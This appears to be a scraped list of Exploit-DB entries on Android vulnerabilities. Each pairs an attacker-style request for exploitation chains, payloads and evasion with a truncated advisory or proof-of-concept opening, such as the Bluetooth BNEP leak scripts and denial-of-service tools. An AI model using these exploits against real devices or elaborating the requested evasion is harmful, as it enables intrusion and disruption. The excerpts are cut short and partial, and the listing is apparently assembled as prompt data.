TARGET: Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass. Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
We already reported four bugs in Android that are caused by the use of getpidcon(), which is fundamentally unsafe: https://bugs.chromium.org/p/project-zero/issues/detail?id=727 (AndroidID-27111481; unexploitable) https://bugs.chromium.org/p/project-zero/issues/detail?id=851 (AndroidID-29431260; getpidcon() used in t...
EXPLOITDB
Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass
Android - Inter-Process munmap due to Race Condition in ashmem: What are 5 proven attack paths? Detail each with tools, commands, payloads.
The MemoryIntArray class allows processes to share an in-memory array of integers backed by an "ashmem" file descriptor. As the class implements the Parcelable interface, it can be inserted into a Parcel, and optionally placed in a Bundle and transferred via binder to remote processes. Instead of directly tracking the...
EXPLOITDB
Android - Inter-Process munmap due to Race Condition in ashmem
Android - sdcardfs Changes current->fs Without Proper Locking — Give 5 different attacker methodologies. For each: exact commands, payloads, and evasion.
Tested on a Pixel 2 (walleye): [ro.build.ab_update]: [true] [ro.build.characteristics]: [nosdcard] [ro.build.date]: [Mon Jun 4 22:10:18 UTC 2018] [ro.build.date.utc]: [1528150218] [ro.build.description]: [walleye-user 8.1.0 OPM2.171026.006.G1 4820017 release-keys] [ro.build.display.id]: [OPM2.171026.006.G1] [ro.build....
EXPLOITDB
Android - sdcardfs Changes current->fs Without Proper Locking
TARGET: Android 7 - 9 VideoPlayer - . Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #expl...
EXPLOITDB
Android 7 - 9 VideoPlayer -
Red team: Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure. List 6 exploitation approaches with: reconnaissance, technique, PoC code.
import os import sys import struct import bluetooth BNEP_PSM = 15 BNEP_FRAME_COMPRESSED_ETHERNET = 0x02 LEAK_ATTEMPTS = 20 def leak(src_bdaddr, dst): bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) bnep.settimeout(5) bnep.bind((src_bdaddr, 0)) print 'Connecting to BNEP...' bnep.connect((dst, B...
EXPLOITDB
Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure
Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
import os import sys import struct import bluetooth BNEP_PSM = 15 BNEP_FRAME_CONTROL = 0x01 # Control types (parsed by bnep_process_control_packet() in bnep_utils.cc) BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01 def oob_read(src_bdaddr, dst): bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) bnep.settimeout(...
EXPLOITDB
Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read
Android FTPServer 1.9.0 - Remote Denial of Service: What are 5 proven attack paths? Detail each with tools, commands, payloads.
# Exploit Title: Android FTPServer 1.9.0 Remote DoS # Date: 03/20/12 # Author: G13 # Twitter: @g13net # Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/ # Download Link: http://www.g13net.com/ftpserver.apk # Version: 1.9.0 # Category: DoS (android) # ##### Vulnerability ##### FTPServer is vul...
EXPLOITDB
Android FTPServer 1.9.0 - Remote Denial of Service
Attacker perspective on Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download: Give 4+ methods with step-by-step instructions and code samples.
''' Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342 There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can ...
EXPLOITDB
Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download
Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation: What are 5 proven attack paths? Detail each with tools, commands, payloads.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678 The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL. This ioctl is permitted for access from the untru...
EXPLOITDB
Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation
Android WAPPushManager - SQL Injection — Give 6 different attacker methodologies. For each: exact commands, payloads, and evasion.
INTRODUCTION ================================== In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check) DETAILS ================================== When a ...
EXPLOITDB
Android WAPPushManager - SQL Injection
Red team: Android WiFi-Direct - Denial of Service. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Android WiFi-Direct Denial of Service 1. *Advisory Information* Title: Android WiFi-Direct Denial of Service Advisory ID: CORE-2015-0002 Advisory URL: http://www.coresecurity.com/advisories/android-wifi-direct-denial-service Date published: 2015-01...
EXPLOITDB
Android WiFi-Direct - Denial of Service
ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC) exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
#!/usr/bin/python #coding: utf-8 # ********************************************************************* # * Author: Marcelo Vázquez (aka s4vitar) * # * ApowerManager Remote Denial of Service (DoS) / Application Crash * # ********************************************************************...
EXPLOITDB
ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)
Broadcom BCM43xx Wi-Fi - : What are 4 proven attack paths? Detail each with tools, commands, payloads.
This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/r...
EXPLOITDB
Broadcom BCM43xx Wi-Fi -
FLEX 1080 < 1085 Web 1.6.0 - Denial of Service: What are 4 proven attack paths? Detail each with tools, commands, payloads.
# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service # Date: 2023-05-06 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android # CVE ID: CVE-2022-2591 #!/usr/bin/env python3 import requests im...
EXPLOITDB
FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
Attacker perspective on FTP Server 1.32 - Denial of Service: Give 4+ methods with step-by-step instructions and code samples.
#!/usr/bin/env python #coding: utf-8 # ************************************************************************ # * Author: Marcelo Vázquez (aka s4vitar) * # * FTP Server 1.32 Remote Denial of Service (DoS) * # *******************************************************...
EXPLOITDB
FTP Server 1.32 - Denial of Service
TARGET: Google Android - . Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=798 Android: Stack-buffer-overflow in /system/bin/sdcard There's an integer overflow issue in get_node_path_locked, which results in a buffer overflow. For all of the calling paths, this is going to overflow a stack buffer in the parent function: stat...
EXPLOITDB
Google Android -
Attacker perspective on Google Android - : Give 6+ methods with step-by-step instructions and code samples.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=979 As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to preven...
EXPLOITDB
Google Android -
Google Android - — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
Original at: https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/ Summary Android devices can be crashed remotely forcing a halt and then a soft reboot by a MITM attacker manipulating assisted GPS/GNSS data provided by Qualcomm. This issue affects the open source code in AOSP and proprietary ...
EXPLOITDB
Google Android -
Google Android - — Give 6 different attacker methodologies. For each: exact commands, payloads, and evasion.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=523 The attached file causes a crash in ih264d_process_intra_mb in avc parsing, likely due to incorrect bounds checking in one of the memcpy or memset calls in the method. The file crashes with the following stack trace in M: 09-08 15:51:01.212 8488 ...
EXPLOITDB
Google Android -
Attacker perspective on Google Android - : Give 5+ methods with step-by-step instructions and code samples.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=932 The code in IOMXNodeInstance.cpp that handles enableNativeBuffers uses port_index without validation, leading to writing the dword value 0 or 1 at an attacker controlled offset from the IOMXNodeInstance structure. The vulnerable code is here (every...
EXPLOITDB
Google Android -
Google Android - : What are 4 proven attack paths? Detail each with tools, commands, payloads.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=971 The "pm_qos" module exposes an interface to kernel space for specifying QoS dependencies. In order to aid in debugging this interface, the module exposes a "debugfs" interface, available under: /sys/kernel/debug/pm_qos This file is world-readable,...
EXPLOITDB
Google Android -
Google Android - : What are 3 proven attack paths? Detail each with tools, commands, payloads.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=984 As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to preven...
EXPLOITDB
Google Android -
Red team: Google Android - android.util.MemoryIntArray Ashmem Race Conditions. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1002 The MemoryIntArray class allows processes to share an in-memory array of integers by transferring an ashmem file descriptor. As the class implements the Parcelable interface, it can be passed within a Parcel or a Bundle and transferred via binder t...
EXPLOITDB
Google Android - android.util.MemoryIntArray Ashmem Race Conditions
Google Android - getpidcon Usage binder Service Replacement Race Condition exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=851 This is very similar to forshaw's bug (<https://code.google.com/p/android/issues/detail?id=200617>, <https://bugs.chromium.org/p/project-zero/issues/detail?id=727>). The servicemanager, when determining whether the sender of a binder transaction is...
EXPLOITDB
Google Android - getpidcon Usage binder Service Replacement Race Condition
Google Android - IMemory Native Interface is Insecure for IPC Use: What are 4 proven attack paths? Detail each with tools, commands, payloads.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=706 Android: IMemory Native Interface is insecure for IPC use Platform: Tested on Android 6.0.1 January patches Class: Elevation of Privilege Summary: The IMemory interface in frameworks/native/libs/binder/IMemory.cpp, used primarily by the media servi...
EXPLOITDB
Google Android - IMemory Native Interface is Insecure for IPC Use
Google Android - Insufficient Binder Message Verification Pointer Leak exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=860 When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim pro...
EXPLOITDB
Google Android - Insufficient Binder Message Verification Pointer Leak
Google Android - Inter-process munmap in android.util.MemoryIntArray: What are 4 proven attack paths? Detail each with tools, commands, payloads.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1001 The MemoryIntArray class allows processes to share an in-memory array of integers by transferring an ashmem file descriptor. As the class implements the Parcelable interface, it can be passed within a Parcel or a Bundle and transferred via binder t...
EXPLOITDB
Google Android - Inter-process munmap in android.util.MemoryIntArray
Google Android - IOMX exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=711 Android: Information Disclosure in IOMX getConfig/getParameter Platform: Verified on google/razor/flo:6.0.1/MMB29O/2459718:user/release-keys Class: Information Disclosure Summary: The GET_CONFIG and GET_PARAMETER calls on IOMX are vulnerable to an ...
EXPLOITDB
Google Android - IOMX
TARGET: Google Android - RKP Information Disclosure via s2-remapping Physical Ranges. Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=982 As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to preven...
EXPLOITDB
Google Android - RKP Information Disclosure via s2-remapping Physical Ranges
TARGET: Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation. Provide 4 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=980 As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to preven...
EXPLOITDB
Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation
Google Android - WifiNative::setHotlist Stack Overflow — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=958 The following code in frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp doesn't validate the parameter params.num_bssid, and then copies that number of elements into a stack-allocated wifi_bssid_hotlist_params structure. I d...
EXPLOITDB
Google Android - WifiNative::setHotlist Stack Overflow
Google Android Kernel 2.6 - Local Denial of Service Crash (PoC): What are 3 proven attack paths? Detail each with tools, commands, payloads.
# Exploit Title: Android Kernel 2.6 Local DoS # Date: 12/7/12 # Author: G13 # Twitter: @g13net # Versions: Android 2.2, 2.3 # Category: DoS (android) # ##### Vulnerability ##### The Android OS is vulnerable to a local DoS when a filename with a length of 2048 or larger is attempted to be written to the sdcard(vfat fs...
EXPLOITDB
Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)